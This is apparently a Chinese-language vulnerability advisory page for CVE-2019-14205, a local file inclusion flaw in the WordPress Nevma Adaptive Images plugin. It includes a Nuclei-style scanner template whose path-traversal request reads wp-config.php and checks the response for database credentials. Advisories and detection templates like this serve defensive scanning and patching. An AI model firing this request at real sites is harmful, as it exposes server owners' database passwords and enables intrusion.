CVE-2019-14205: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Nevma Adaptive Images | POC: 已公开

漏洞描述

WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.

PoC代码[已公开]

id: CVE-2019-14205

info:
  name: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
  remediation: |
    Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor.
  reference:
    - https://github.com/security-kma/EXPLOITING-CVE-2019-14205
    - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
    - https://wordpress.org/plugins/adaptive-images/#developers
    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14205
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14205
    cwe-id: CWE-22
    epss-score: 0.68048
    epss-percentile: 0.9855
    cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: nevma
    product: adaptive_images
    framework: wordpress
  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206bf5128d2732084af5ca6e40cc51035a8a5508953edc81c0d85fe0f1904410f5022100f5da8d208da828e4f1b2ce23137505a2452652cf357d993b3b6bcf88cd78e845:922c64590222798bb761d5b6d8e72950

相关漏洞推荐